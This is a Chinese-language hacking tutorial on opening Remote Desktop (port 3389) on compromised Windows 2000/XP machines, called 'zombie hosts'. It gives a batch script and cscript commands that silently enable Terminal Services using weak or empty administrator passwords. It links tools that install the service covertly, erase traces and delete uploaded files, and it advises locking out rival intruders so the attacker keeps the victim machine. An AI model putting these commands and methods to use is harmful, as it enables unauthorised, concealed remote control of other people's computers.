在成功的開啟了3389服務後，我們可以利用黑客營提供的3389連接工具對目標計算機進行遠程連接，不過此時你也許會感到不方便，因為3389的遠程管理不支持復制粘貼形式的文件傳輸，之能夠復制粘貼本機的一些字符。對付這個問題我們只需要在網上找一個小型的FTP開啟工具，將對方的FTP開啟就可以了。即便此時有人乘虛而入正搶你的“獵物”，你可以使用［logout］命令將對方踢下去，然後刪除掉對方溢出的帳號和口令，開啟之後在根據前面所說的修改端口，然後幫助“獵物”打好補丁，防止其它的入侵者破壞你的“獵物”。一套完美的3389控制就做好了。

怎麼樣開3389端口，這裡我把他們總結一下，很全面,希望對你有用:
1，打開記事本，編輯內容如下：
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好後存為BAT文件，上傳至肉雞，執行。這裡值得注意的是要確定winnt是否在c盤，如果在其他盤則需要改動。

2 (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05
地址:www.netsill.com/rots.zip
使用方法：
在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調用腳本，例如：

c:\>cscript ROTS.vbs <目標IP> <用戶名> <密碼> [服務端口] [自動重起選項]

服務端口： 設置終端服務的服務端口。默認是3389。
自動重起選項： 使用/r表示安裝完成後自動重起目標使設置生效。
使用/fr表示強制重起目標。（如果/r不行，可以試試這個）
使用此參數時，端口設置不能忽略。

比如掃描到了一個有NT弱口令的服務器，IP地址是222.222.222.222，管理員帳戶是administrator，密碼為空
運行CMD（2000下的DOS），我們給它開終端！
命令如下！
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令應該可以理解吧？cscript reg.vbe這是命令，後面的是IP，然後是管理員帳戶，接這是密碼，因為222.222.222.222 這台服務器的管理員密碼是空的，那就用雙引號表示為空，再後面是端口，你可以任意設置終端的端口，/fr是重啟命令（強制重啟，一般我都用這個，你也可以/r，這是普通重啟）

腳本會判斷目標系統類型，如果不是server及以上版本，就會提示你是否要取消。
因為pro版不能安裝終端服務。
如果你確信腳本判斷錯誤，就繼續安裝好了。

如果要對本地使用，IP地址為127.0.0.1或者一個點（用.表示），用戶名和密碼都為空（用""表示）。

腳本訪問的目標的135端口，如果目標135端口未開放，或者WMI服務關閉，那麼腳本就沒用了。

3，下載3389自動安裝程序-djshao正式版5.0
地址www.netsill.com/djshao.zip
說明：
解壓djshao5.0.zip,用你的隨便什麼方法把把解壓出來的djxyxs.exe上傳到肉雞的c:\winnt\temp下，然後進入c:\winnt\temp目錄執行djxyxs.exe解壓縮文件，然後再執行解壓縮出來的azzd.exe文件，等一會肉雞會自動重啟！重啟後會出現終端服務！

特點：1、不用修改注冊表的安裝路徑，注冊表會自動修改，安裝完後會自動恢復到原來的安裝路徑，2、在後台安靜模式運行，就算肉雞旁有人也沒有關系！3、在添加和刪除中看不出終端服務被安裝的痕跡，也就是啟動終端前不會打鉤，4、不會在肉雞上留下你的上傳文件，在安裝完終端服務後會會自動刪除你上傳到c:\winnt\temp下的任何文件！5、不管肉雞的winnt裝在什麼盤上都無所謂！6、安裝完終端後會刪除在管理工具中的終端快捷圖標！7、在沒有安裝終端前，終端服務是被禁止的！安裝終端後，終端服務被改為自動！但是如果在安裝前終端服務是手動！安裝後就可能還是手動！等重啟後就不會打開服務！所以在軟件中加了sc指令，等安裝完後，不管終端服務是禁止還是手動還是自動，全部改為自動。8、自動檢測肉雞是不是服務器版，如果不是刪除原文件，不執行安裝，如果是服務器版就執行安裝！9、支持中日韓繁四個版本的win2000服務器版！

5，下載DameWare NT Utilities 3.66.0.0 注冊版
地址www.netsill.com/dwmrcw36600.zip
安裝注冊完畢後輸入對方IP用戶名密碼，等待出現是否安裝的對話框點是。
復制啟動後出現對方桌面。
在對方桌面進入控制面版，點添加或刪除程序。進入後點添加/刪除windows組件，找到終端服務，點際進入後在啟動終端服務上打上勾。確定自動提示重起，重起後OK。